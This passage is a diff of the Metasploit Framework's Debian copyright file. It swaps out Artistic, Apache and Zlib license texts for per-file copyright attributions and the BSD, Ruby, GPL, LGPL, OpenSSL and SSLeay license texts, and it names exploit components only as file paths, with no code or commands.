- You are always permitted to make arrangements wholly outside of this - license directly with the Copyright Holder of a given Package. If the - terms of this license do not permit the full use that you propose to - make of the Package, you should contact the Copyright Holder and seek - a different licensing arrangement. - . - Definitions - . - "Copyright Holder" means the individual(s) or organization(s) - named in the copyright notice for the entire Package. - . - "Contributor" means any party that has contributed code or other - material to the Package, in accordance with the Copyright Holder's - procedures. - . - "You" and "your" means any person who would like to copy, - distribute, or modify the Package. - . - "Package" means the collection of files distributed by the - Copyright Holder, and derivatives of that collection and/or of - those files. A given Package may consist of either the Standard - Version, or a Modified Version. - . - "Distribute" means providing a copy of the Package or making it - accessible to anyone else, or in the case of a company or - organization, to others outside of your company or organization. - . - "Distributor Fee" means any fee that you charge for Distributing - this Package or providing support for this Package to another - party. It does not mean licensing fees. - . - "Standard Version" refers to the Package if it has not been - modified, or has been modified only in ways explicitly requested - by the Copyright Holder. - . - "Modified Version" means the Package, if it has been changed, and - such changes were not explicitly requested by the Copyright - Holder. - . - "Original License" means this Artistic License as Distributed with - the Standard Version of the Package, in its current version or as - it may be modified by The Perl Foundation in the future. - . - "Source" form means the source code, documentation source, and - configuration files for the Package. - . 
- "Compiled" form means the compiled bytecode, object code, binary, - or any other form resulting from mechanical transformation or - translation of the Source form. - . - Permission for Use and Modification Without Distribution - . - (1) You are permitted to use the Standard Version and create and use - Modified Versions for any purpose without restriction, provided that - you do not Distribute the Modified Version. - . - . - Permissions for Redistribution of the Standard Version - . - (2) You may Distribute verbatim copies of the Source form of the - Standard Version of this Package in any medium without restriction, - either gratis or for a Distributor Fee, provided that you duplicate - all of the original copyright notices and associated disclaimers. At - your discretion, such verbatim copies may or may not include a - Compiled form of the Package. - . - (3) You may apply any bug fixes, portability changes, and other - modifications made available from the Copyright Holder. The resulting - Package will still be considered the Standard Version, and as such - will be subject to the Original License. - . - . - Distribution of Modified Versions of the Package as Source - . - (4) You may Distribute your Modified Version as Source (either gratis - or for a Distributor Fee, and with or without a Compiled form of the - Modified Version) provided that you clearly document how it differs - from the Standard Version, including, but not limited to, documenting - any non-standard features, executables, or modules, and provided that - you do at least ONE of the following: - . - (a) make the Modified Version available to the Copyright Holder - of the Standard Version, under the Original License, so that the - Copyright Holder may include your modifications in the Standard - Version. - . - (b) ensure that installation of your Modified Version does not - prevent the user installing or running the Standard Version. 
In - addition, the Modified Version must bear a name that is different - from the name of the Standard Version. - . - (c) allow anyone who receives a copy of the Modified Version to - make the Source form of the Modified Version available to others - under - . - (i) the Original License or - . - (ii) a license that permits the licensee to freely copy, - modify and redistribute the Modified Version using the same - licensing terms that apply to the copy that the licensee - received, and requires that the Source form of the Modified - Version, and of any works derived from it, be made freely - available in that license fees are prohibited but Distributor - Fees are allowed. - . - . - Distribution of Compiled Forms of the Standard Version - or Modified Versions without the Source - . - (5) You may Distribute Compiled forms of the Standard Version without - the Source, provided that you include complete instructions on how to - get the Source of the Standard Version. Such instructions must be - valid at the time of your distribution. If these instructions, at any - time while you are carrying out such distribution, become invalid, you - must provide new instructions on demand or cease further distribution. - If you provide valid instructions or cease distribution within thirty - days after you become aware that the instructions are invalid, then - you do not forfeit any of your rights under this license. - . - (6) You may Distribute a Modified Version in Compiled form without - the Source, provided that you comply with Section 4 with respect to - the Source of the Modified Version. - . - . - Aggregating or Linking the Package - . - (7) You may aggregate the Package (either the Standard Version or - Modified Version) with other packages and Distribute the resulting - aggregation provided that you do not charge a licensing fee for the - Package. Distributor Fees are permitted, and licensing fees for other - components in the aggregation are permitted. 
The terms of this license - apply to the use and Distribution of the Standard or Modified Versions - as included in the aggregation. - . - (8) You are permitted to link Modified and Standard Versions with - other works, to embed the Package in a larger work of your own, or to - build stand-alone binary or bytecode versions of applications that - include the Package, and Distribute the result without restriction, - provided the result does not expose a direct interface to the Package. - . - . - Items That are Not Considered Part of a Modified Version - . - (9) Works (including, but not limited to, modules and scripts) that - merely extend or make use of the Package, do not, by themselves, cause - the Package to be a Modified Version. In addition, such works are not - considered parts of the Package itself, and are not subject to the - terms of this license. - . - . - General Provisions - . - (10) Any use, modification, and distribution of the Standard or - Modified Versions is governed by this Artistic License. By using, - modifying or distributing the Package, you accept this license. Do not - use, modify, or distribute the Package, if you do not accept this - license. - . - (11) If your Modified Version has been derived from a Modified - Version made by someone other than you, you are nevertheless required - to ensure that your Modified Version complies with the requirements of - this license. - . - (12) This license does not grant you the right to use any trademark, - service mark, tradename, or logo of the Copyright Holder. - . - (13) This license includes the non-exclusive, worldwide, - free-of-charge patent license to make, have made, use, offer to sell, - sell, import and otherwise transfer the Package with respect to any - patent claims licensable by the Copyright Holder that are necessarily - infringed by the Package. 
If you institute patent litigation - (including a cross-claim or counterclaim) against any party alleging - that the Package constitutes direct or contributory patent - infringement, then this Artistic License to you shall terminate on the - date that such litigation is filed. - . - (14) Disclaimer of Warranty: - THE PACKAGE IS PROVIDED BY THE COPYRIGHT HOLDER AND CONTRIBUTORS "AS - IS' AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES. THE IMPLIED - WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR - NON-INFRINGEMENT ARE DISCLAIMED TO THE EXTENT PERMITTED BY YOUR LOCAL - LAW. UNLESS REQUIRED BY LAW, NO COPYRIGHT HOLDER OR CONTRIBUTOR WILL - BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL - DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF - ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -License: Apache - Version 2.0, January 2004 - http://www.apache.org/licenses/ - . - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - . - 1. Definitions. - . - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - . - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - . - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - . - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - . 
- "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - . - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - . - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - . - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - . - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. 
For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - . - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - . - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - . - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. 
If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - . - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - . - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - . - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - . - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - . - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. 
You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - . - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - . - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - . - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - . - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - . - 8. 
Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - . - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - . - END OF TERMS AND CONDITIONS - . - APPENDIX: How to apply the Apache License to your work. - . - To apply the Apache License to your work, attach the following - boilerplate notice, with the fields enclosed by brackets "[]" - replaced with your own identifying information. (Don't include - the brackets!) The text should be enclosed in the appropriate - comment syntax for the file format. We also recommend that a - file or class name and description of purpose be included on the - same "printed page" as the copyright notice for easier - identification within third-party archives. - . 
- Copyright [yyyy] [name of copyright owner] - . - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - . - http://www.apache.org/licenses/LICENSE-2.0 - . - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - -License: Zlib - This software is provided 'as-is', without any express or implied - warranty. In no event will the authors be held liable for any damages - arising from the use of this software. - . - Permission is granted to anyone to use this software for any purpose, - including commercial applications, and to alter it and redistribute it - freely, subject to the following restrictions: - . - 1. The origin of this software must not be misrepresented; you must not - claim that you wrote the original software. If you use this software - in a product, an acknowledgment in the product documentation would be - appreciated but is not required. - 2. Altered source versions must be plainly marked as such, and must not be - misrepresented as being the original software. +https://github.com/rapid7/metasploit-framework/blob/master/LICENSE + +Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/ +Source: http://www.metasploit.com/ + +Files: * +Copyright: 2006-2016, Rapid7, Inc. +License: BSD-3-clause + +# The Metasploit Framework is provided under the 3-clause BSD license provided +# at the end of this file. +# +# The copyright on this package is held by Rapid7, Inc. +# +# This license does not apply to third-party components detailed below. 
+# +# Last updated: 2013-Nov-04 +# + +Files: data/templates/to_mem_pshreflection.ps1.template +Copyright: 2012, Matthew Graeber +License: BSD-3-clause + +Files: data/john/* +Copyright: 1996-2011 Solar Designer. +License: GPL-2 + +Files: external/pcaprub/* +Copyright: 2007-2008, Alastair Houghton +License: LGPL-2.1 + +Files: external/ruby-kissfft/* +Copyright: 2003-2010 Mark Borgerding + 2009-2012 H D Moore +License: BSD-3-clause + +Files: external/source/exploits/IE11SandboxEscapes/* +Copyright: James Forshaw, 2014 +License: GPLv3 + +Files: external/source/byakugan/* +Copyright: Lurene Grenier, 2009 +License: BSD-3-clause + +Files: external/source/ipwn/* +Copyright: 2004-2005 vlad902 + 2007 H D Moore +License: GPL-2 and Artistic + +Files: external/source/ReflectiveDLLInjection/* +Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com) +License: BSD-3-clause + +Files: external/source/metsvc/* +Copyright: 2007, Determina Inc. +License: BSD-3-clause + +Files: external/source/tightvnc/* +Copyright: 1999 AT&T Laboratories Cambridge. + 2000 Tridia Corp. + 2002-2003 RealVNC Ltd. + 2001-2004 HorizonLive.com, Inc. + 2000-2007 Constantin Kaplinsky + 2000-2009 TightVNC Group +License: GPL-2 + +Files: external/source/unixasm/* +Copyright: 2004-2008 Ramon de Carvalho Valle +License: BSD-4-clause + +Files: external/source/vncdll/winvnc/* +Copyright: 1999 AT&T Laboratories Cambridge. + 2000 Tridia Corp. + 2002-2003 RealVNC Ltd. + 2001-2004 HorizonLive.com, Inc. + 2000-2006 Constantin Kaplinsky. + 2000-2009 TightVNC Group +License: GPL-2 + +Files: lib/anemone.rb lib/anemone/* +Copyright: 2009 Vertive, Inc. 
+License: MIT + +Files: lib/bit-struct.rb lib/bit-struct/* +Copyright: 2005-2009, Joel VanderWerf +License: Ruby + +Files: lib/metasm.rb lib/metasm/* data/cpuinfo/* +Copyright: 2006-2010 Yoann GUILLOT +License: LGPL-2.1 + +Files: lib/nessus/* +Copyright: Vlatoko Kosturjak +License: BSD-3-clause + +Files: lib/net/dns.rb lib/net/dns/* +Copyright: 2006 Marco Ceresa +License: Ruby + +Files: lib/net/ssh.rb lib/net/ssh/* +Copyright: 2008 Jamis Buck +License: MIT + +Files: lib/packetfu.rb lib/packetfu/* +Copyright: 2008-2012 Tod Beardsley +License: BSD-3-clause + +Files: lib/postgres_msf.rb lib/postgres/postgres-pr/message.rb lib/postgres/postgres-pr/connection.rb +Copyright: 2005 Michael Neumann +License: BSD-3-clause or Ruby + +Files: lib/openvas/* +Copyright: No copyright statement provided +License: MIT + +Files: lib/rabal/* +Copyright: Jeremy Hinegadner +License: Ruby + +Files: lib/rbmysql.rb lib/rbmysql/* +Copyright: 2009 tommy +License: Ruby + +Files: lib/rbreadline.rb +Copyright: 2009 Park Heesob +License: BSD-3-clause + +Files: lib/rkelly/* +Copyright: 2007, 2008, 2009 Aaron Patternson, John Barnette +License: MIT + +Files: lib/snmp.rb lib/snmp/* +Copyright: 2004, David R. Halliday +License: Ruby + +Files: lib/sshkey.rb lib/sshkey/* +Copyright: 2011 James Miller +License: MIT + +Files: lib/windows_console_color_support.rb +Copyright: 2011 Michael 'mihi' Schierl +License: BSD-3-clause + +Files: lib/zip.rb lib/zip/* +Copyright: 2002-2004, Thomas Sandergaard +License: Ruby + +Files: modules/payloads/singles/windows/speak_pwned.rb +Copyright: 2009-2010 Berend-Jan "SkyLined" Wever +License: BSD-3-clause + +Files: data/webcam/api.js +Copyright: Copyright 2013 Muaz Khan<@muazkh>. 
+License: MIT + + +# +# Gems +# + +Files: activemodel +Copyright: 2004-2011 David Heinemeier Hansson +License: MIT + +Files: activerecord +Copyright: 2004-2011 David Heinemeier Hansson +License: MIT + +Files: activesupport +Copyright: 2005-2011 David Heinemeier Hansson +License: MIT + +Files: arel +Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson +License: MIT + +Files: bcrypt +Copyright: 2007-2011 Coda Hale +License: MIT + +Files: builder +Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com) +License: MIT + +Files: database_cleaner +Copyright: 2009 Ben Mabey +License: MIT + +Files: diff-lcs +Copyright: 2004-2011 Austin Ziegler +License: MIT + +Files: factory_girl +Copyright: 2008-2013 Joe Ferris and thoughtbot, inc. +License: MIT + +Files: fivemat +Copyright: 2012 Tim Pope +License: MIT + +Files: i18n +Copyright: 2008 The Ruby I18n team +License: MIT + +Files: json +Copyright: Daniel Luz +License: Ruby + +Files: metasploit_data_models +Copyright: 2012 Rapid7, Inc. +License: MIT + +Files: mini_portile +Copyright: 2011 Luis Lavena +License: MIT + +Files: msgpack +Copyright: Austin Ziegler +License: Ruby + +Files: multi_json +Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc. +License: MIT + +Files: network_interface +Copyright: 2012, Rapid7, Inc. 
+License: MIT + +Files: nokogiri +Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada +License: MIT + +Files: packetfu +Copyright: 2008-2012 Tod Beardsley +License: BSD-3-clause + +Files: pcaprub +Copyright: 2007-2008, Alastair Houghton +License: LGPL-2.1 + +Files: pg +Copyright: 1997-2012 by the authors +License: Ruby + +Files: rake +Copyright: 2003, 2004 Jim Weirich +License: MIT + +Files: redcarpet +Copyright: 2009 Natacha Porté +License: MIT + +Files: robots +Copyright: 2008 Kyle Maxwell, contributors +License: MIT + +Files: rspec +Copyright: 2009 Chad Humphries, David Chelimsky +License: MIT + +Files: shoulda-matchers +Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc. +License: MIT + +Files: simplecov +Copyright: 2010-2012 Christoph Olszowka +License: MIT + +Files: timecop +Copyright: 2012 Travis Jeffery, John Trupiano +License: MIT + +Files: tzinfo +Copyright: 2005-2006 Philip Ross +License: MIT + +Files: yard +Copyright: 2007-2013 Loren Segal +License: MIT + + +License: BSD-2-clause + Redistribution and use in source and binary forms, with or without modification, + are permitted provided that the following conditions are met: + . + Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + . + Redistributions in binary form must reproduce the above copyright notice, this + list of conditions and the following disclaimer in the documentation and/or + other materials provided with the distribution. + . + THIS SOFTWARE IS PROVIDED BY {{THE COPYRIGHT HOLDERS AND CONTRIBUTORS}} "AS IS" + AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + DISCLAIMED. 
IN NO EVENT SHALL {{THE COPYRIGHT HOLDER OR CONTRIBUTORS}} BE + LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE + GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT + LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT + OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +License: BSD-3-clause + Redistribution and use in source and binary forms, with or without modification, + are permitted provided that the following conditions are met: + . + * Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + . + * Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + . + * Neither the name of Rapid7, Inc. nor the names of its contributors + may be used to endorse or promote products derived from this software + without specific prior written permission. + . + THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND + ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED + WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR + ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES + (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; + LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON + ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT + (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS + SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +License: BSD-4-clause + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are met: + 1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + 3. All advertising materials mentioning features or use of this software + must display the following acknowledgement: + This product includes software developed by the . + 4. Neither the name of the nor the + names of its contributors may be used to endorse or promote products + derived from this software without specific prior written permission. + . + THIS SOFTWARE IS PROVIDED BY ''AS IS'' AND ANY + EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED + WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + DISCLAIMED. 
IN NO EVENT SHALL BE LIABLE FOR ANY + DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES + (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; + LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND + ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT + (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS + SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +License: Ruby + 1. You may make and give away verbatim copies of the source form of the + software without restriction, provided that you duplicate all of the + original copyright notices and associated disclaimers. + . + 2. You may modify your copy of the software in any way, provided that + you do at least ONE of the following: + . + a) place your modifications in the Public Domain or otherwise + make them Freely Available, such as by posting said + modifications to Usenet or an equivalent medium, or by allowing + the author to include your modifications in the software. + . + b) use the modified software only within your corporation or + organization. + . + c) rename any non-standard executables so the names do not conflict + with standard executables, which must also be provided. + . + d) make other distribution arrangements with the author. + . + 3. You may distribute the software in object code or executable + form, provided that you do at least ONE of the following: + . + a) distribute the executables and library files of the software, + together with instructions (in the manual page or equivalent) + on where to get the original distribution. + . + b) accompany the distribution with the machine-readable source of + the software. + . + c) give non-standard executables non-standard names, with + instructions on where to get the original software distribution. + . + d) make other distribution arrangements with the author. + . + 4. 
You may modify and include the part of the software into any other + software (possibly commercial). But some files in the distribution + are not written by the author, so that they are not under this terms. + They are gc.c(partly), utils.c(partly), regex.[ch], fnmatch.[ch], + glob.c, st.[ch] and some files under the ./missing directory. See + each file for the copying condition. + . + 5. The scripts and library files supplied as input to or produced as + output from the software do not automatically fall under the + copyright of the software, but belong to whomever generated them, + and may be sold commercially, and may be aggregated with this + software. + . + 6. THIS SOFTWARE IS PROVIDED "AS IS" AND WITHOUT ANY EXPRESS OR + IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED + WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR + PURPOSE. + +License: GPL-2 + This program is free software; you can redistribute it + and/or modify it under the terms of the GNU General Public + License as published by the Free Software Foundation; either + version 2 of the License, or (at your option) any later + version. + . + This program is distributed in the hope that it will be + useful, but WITHOUT ANY WARRANTY; without even the implied + warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR + PURPOSE. See the GNU General Public License for more + details. + . + You should have received a copy of the GNU General Public + License along with this package; if not, write to the Free + Software Foundation, Inc., 51 Franklin St, Fifth Floor, + Boston, MA 02110-1301 USA + . + On Debian systems, the full text of the GNU General Public + License version 2 can be found in the file + `/usr/share/common-licenses/GPL-2'. 
+ +License: LGPL-2.1 + This library is free software; you can redistribute it and/or + modify it under the terms of the GNU Lesser General Public + License as published by the Free Software Foundation; either + version 2.1 of the License, or (at your option) any later version. + . + This library is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + Lesser General Public License for more details. + . + You should have received a copy of the GNU Lesser General Public + License along with this library; if not, write to the Free Software + Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + +License: OpenSSL + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions + are met: + . + 1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + . + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in + the documentation and/or other materials provided with the + distribution. + . + 3. All advertising materials mentioning features or use of this + software must display the following acknowledgment: + "This product includes software developed by the OpenSSL Project + for use in the OpenSSL Toolkit. (http://www.openssl.org/)" + . + 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to + endorse or promote products derived from this software without + prior written permission. For written permission, please contact + openssl-core@openssl.org. + . + 5. Products derived from this software may not be called "OpenSSL" + nor may "OpenSSL" appear in their names without prior written + permission of the OpenSSL Project. + . + 6. 
Redistributions of any form whatsoever must retain the following + acknowledgment: + "This product includes software developed by the OpenSSL Project + for use in the OpenSSL Toolkit (http://www.openssl.org/)" + . + THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT `AS IS'' AND ANY + EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR + PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR + ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, + SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT + NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; + LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, + STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) + ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED + OF THE POSSIBILITY OF SUCH DAMAGE. + . + This product includes cryptographic software written by Eric Young + (eay@cryptsoft.com). This product includes software written by Tim + Hudson (tjh@cryptsoft.com). + +License: SSLeay + This package is an SSL implementation written + by Eric Young (eay@cryptsoft.com). + The implementation was written so as to conform with Netscapes SSL. + . + This library is free for commercial and non-commercial use as long as + the following conditions are aheared to. The following conditions + apply to all code found in this distribution, be it the RC4, RSA, + lhash, DES, etc., code; not just the SSL code. The SSL documentation + included with this distribution is covered by the same copyright terms + except that the holder is Tim Hudson (tjh@cryptsoft.com). + . + Copyright remains Eric Young's, and as such any Copyright notices in + the code are not to be removed. + If this package is used in a product, Eric Young should be given attribution + as the author of the parts of the library used. 
+ This can be in the form of a textual message at program startup or + in documentation (online or textual) provided with the package. + . + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions + are met: + 1. Redistributions of source code must retain the copyright + notice, this list of conditions and the following disclaimer. + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + 3. All advertising materials mentioning features or use of this software + must display the following acknowledgement: + "This product includes cryptographic software written by + Eric Young (eay@cryptsoft.com)" + The word 'cryptographic' can be left out if the rouines from the library + being used are not cryptographic related :-). + 4. If you include any Windows specific code (or a derivative thereof) from + the apps directory (application code) you must include an acknowledgement: + "This product includes software written by Tim Hudson (tjh@cryptsoft.com)" + . + THIS SOFTWARE IS PROVIDED BY ERIC YOUNG `AS IS'' AND + ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + ARE DISCLAIMED. IN NO EVENT SHALL THE 